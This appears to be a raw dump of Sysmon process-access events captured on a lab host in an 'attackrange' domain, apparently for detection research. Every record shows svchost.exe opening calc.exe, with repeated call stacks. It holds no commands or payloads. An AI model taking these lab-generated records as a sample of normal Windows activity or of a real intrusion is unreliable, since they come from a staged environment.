22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362246Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362245Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362244Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362243Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362242Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362241Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362240Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362239Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362238Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362237Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362236Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362235Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362234Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362233Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362232Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362231Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362230Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362229Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362228Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362227Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362226Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 